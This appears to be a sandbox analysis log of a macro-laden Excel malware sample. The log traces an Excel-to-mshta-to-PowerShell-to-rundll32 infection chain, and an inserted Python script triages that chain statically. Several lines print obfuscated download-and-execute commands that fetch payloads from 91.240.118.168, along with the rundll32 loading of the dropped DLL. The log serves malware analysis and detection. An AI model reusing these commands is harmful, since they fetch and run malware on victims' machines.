Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B0B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003BA03A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A323F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003C023A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003BBA31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003B9E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A7037
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003BE835
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003BB227
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003C0014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A8411
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003A3C16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003AF401
Source: 4B14.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Source: 364453688149503140239183.xls Macro extractor: Sheet name: GODVIN
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002DE249 DeleteService,
Source: 364453688149503140239183.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\364453688149503140239183.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Bwqooqqzlaw\
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Source: 364453688149503140239183.xls OLE indicator, VBA macros: true
Source: 364453688149503140239183.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/9@1/47
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: 364453688149503140239183.xls OLE indicator, Workbook stream: true
Source: 364453688149503140239183.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,
Source: 364453688149503140239183.xls ReversingLabs: Detection: 18%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........l.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...................../,k....................................}..v............0...............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...................../,k..... ..............................}..v....h.......0.................l.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.,k....................................}..v............0...............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................P.,k....x.l.............................}..v....8.......0.................l.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................,k....................................}..v....P.......0...............................h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.................,k....(.l.............................}..v............0.................l.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'.................,k....E...............................}..v.....k......0...............x.l.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.................,k....E...............................}..v............0...............x.l.............h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............H.#.....:.......h...............
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/vvv/ppp/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer
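The process chain recorded above (Excel 4.0 macro to cmd.exe with caret-escaped arguments, to mshta.exe, to powershell.exe whose download cmdlet is split into .replace()-obfuscated fragments, to rundll32.exe loading the dropped DLL and its renamed copies) can be triaged statically. The script below is an added example and is not part of the Joe Sandbox report or of the sample: it embeds the process-creation records listed above as its input, recovers both URLs without executing any of the commands, and flags the parent/child pairs behind the report's "Microsoft Office Product Spawning Windows Shell" and "MSHTA Spawning Windows Shell" hits. The rule names, the image-name heuristics and the checks for a rundll32 module under C:\ProgramData or without a .dll extension are this example's own assumptions, not rules taken from the report.

```python
"""Static triage of the process chain listed above: an added example, not code from the
report or the sample. Rule names and the path heuristics below are this example's assumptions."""
import re
from typing import Dict, List, Tuple

EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
CMD = r"C:\Windows\System32\cmd.exe"
PWSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RUNDLL = r"C:\Windows\SysWOW64\rundll32.exe"
# powershell.exe command line exactly as the report records it (wrapped for width)
PS_CMDLINE = (
    '"' + PWSH + "\" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec"
    "{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); "
    "$c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl"
    "{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); "
    "$c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}"
    "://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"
)
# (parent image, child command line) copied from the report's process tree (first persistence copy only)
RECORDS: List[Tuple[str, str]] = [
    ("unknown", '"' + EXCEL + '" /automation -Embedding'),
    (EXCEL, "CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l"),
    (CMD, "mshta http://91.240.118.168/vvv/ppp/fe.html"),
    (r"C:\Windows\System32\mshta.exe", PS_CMDLINE),
    (PWSH, r'"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD'),
    (CMD, r"C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD"),
    (RUNDLL, r'C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer'),
    (RUNDLL, r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ'),
    (RUNDLL, r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer'),
]
OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
_LIT = r"'((?:[^']|'')*)'"  # PowerShell single-quoted literal; '' is an escaped quote
_ASSIGN_RE = re.compile(r"\$(\w+)=" + _LIT + r"(?:\.replace\(" + _LIT + r",\s*" + _LIT + r"\))?", re.I)
_JOIN_RE = re.compile(r"\$(\w+)=\(((?:\$\w+,?\s*)+)-Join\s*''\)", re.I)

def strip_cmd_carets(cmdline: str) -> str:
    """Undo cmd.exe caret escaping (^x -> x, so ^^ -> ^); it hides 'mshta' and the URL."""
    return re.sub(r"\^(.)", r"\1", cmdline)

def resolve_powershell_strings(cmdline: str) -> Dict[str, str]:
    """Fold $x='..'.replace('a','b') and $y=($x,$z -Join '') without running PowerShell."""
    values: Dict[str, str] = {}
    for name, lit, old, new in _ASSIGN_RE.findall(cmdline):
        value = lit.replace("''", "'")
        if old:
            value = value.replace(old.replace("''", "'"), new.replace("''", "'"))
        values[name] = value
    for name, parts in _JOIN_RE.findall(cmdline):
        values[name] = "".join(values.get(r, "") for r in re.findall(r"\$(\w+)", parts))
    return values

def has_invoke_expression(cmdline: str) -> bool:
    """I`E`X is IEX with PowerShell's escape character inserted to defeat substring matching."""
    return re.search(r"\b(iex|invoke-expression)\b", cmdline.replace("`", ""), re.I) is not None

def image_from_cmdline(cmdline: str) -> str:
    """First token of a command line as a lower-case image name ('mshta' -> 'mshta.exe')."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    name = (m.group(1) or m.group(2)).rsplit("\\", 1)[-1].lower() if m else ""
    return name if name.endswith(".exe") else name + ".exe"

def classify_spawn(parent_path: str, child_cmdline: str) -> List[str]:
    """Rule labels (this example's own names) that a parent/child pair triggers."""
    parent, child = parent_path.rsplit("\\", 1)[-1].lower(), image_from_cmdline(child_cmdline)
    hits: List[str] = []
    if parent in OFFICE and child in SHELLS:
        hits.append("office_spawns_shell")  # cf. the report's Sigma hit for Office spawning a shell
    if parent == "mshta.exe" and child in SHELLS:
        hits.append("mshta_spawns_shell")  # cf. "MSHTA Spawning Windows Shell"
    if child == "rundll32.exe":
        m = re.search(r'rundll32\.exe\s+"?([^",\s]+)', child_cmdline, re.I)
        module = m.group(1).lower() if m else ""
        if module.startswith("c:\\programdata\\"):
            hits.append("rundll32_module_in_programdata")
        elif module and not module.endswith(".dll"):
            hits.append("rundll32_non_dll_module")  # cojfo.cqz is the same DLL under a random name
    return hits

def extract_urls(records: List[Tuple[str, str]]) -> List[str]:
    urls: List[str] = []
    for _, cmdline in records:
        text = strip_cmd_carets(cmdline) if image_from_cmdline(cmdline) == "cmd.exe" else cmdline
        text += " " + " ".join(resolve_powershell_strings(cmdline).values())
        urls += re.findall(r"https?://[^\s'\"<>)]+", text)
    return list(dict.fromkeys(urls))  # first-appearance order, duplicates removed

def triage(records: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    return [(image_from_cmdline(c), rule) for p, c in records for rule in classify_spawn(p, c)]

if __name__ == "__main__":
    print("\n".join(extract_urls(RECORDS)))
    print("\n".join(f"{rule:32s}{child}" for child, rule in triage(RECORDS)))
    print("IEX hidden with backticks:", has_invoke_expression(PS_CMDLINE))
```

Running it prints the two URLs (fe.html for the mshta stage, fe.png for the PowerShell stage) and six rule hits; the string folding is done purely on the text, so the resolver never hands anything to PowerShell and is safe to run against live telemetry.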
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE7DE.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: 4B14.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
Source: C:\Windows\System32\mshta.exe Code function: 4_3_039408D2 push 8B490321h; iretd
Source: C:\Windows\System32\mshta.exe Code function: 4_3_039400BB push 8B490321h; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003C0C04 push ss; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003C0F14 push FFFFFFF8h; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
Source: QWER.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x9432d
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz (copy)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe TID: 1832 Thread sleep time: -360000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: rundll32.exe, 0000000C.00000002.564500652.000000000057A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00354087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F4087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00214087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002E4087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00B14087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003B3487 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00214087 mov eax, dword ptr fs:[00000030h]
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/vvv/ppp/fe.html
                            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
